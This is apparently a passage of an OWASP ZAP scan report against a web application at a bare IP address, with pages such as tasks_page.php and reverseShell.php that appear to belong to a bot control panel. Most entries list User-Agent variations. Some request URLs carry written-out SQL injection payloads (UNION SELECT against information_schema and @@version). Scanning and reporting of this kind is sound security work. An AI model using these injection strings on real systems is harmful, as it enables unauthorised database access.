URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 368 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
Instances 98
Solution
Reference https://owasp.org/wstg
Tags
CWE Id
WASC Id
Plugin Id 10104
Informational
User Controllable HTML Element Attribute (Potential XSS)
Description
This check looks at user-supplied input in query string parameters and POST data to identify where certain HTML attribute values might be controlled. This provides hot-spot detection for XSS (cross-site scripting) that will require further review by a security analyst to determine exploitability.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter bot
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter id
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter bot
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter id
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
Instances 4
Solution
Validate all input and sanitize output it before writing to any HTML attributes.
Reference https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 20
WASC Id 20
Plugin Id 10031
Informational
Verification Request Identified
Description
The given request has been identified as a good candidate for authentication verification. If the request is in a context which has a Verification Strategy set to "Poll" but where the URL is empty then this rule will fill in the correct values.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence 200 OK
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
Instances 1
Solution
This is an informational alert rather than a vulnerability and so there is nothing to fix.
Reference https://www.zaproxy.org/docs/desktop/addons/authentication-helper/verif-id
Tags
CWE Id
WASC Id
Plugin Id 10113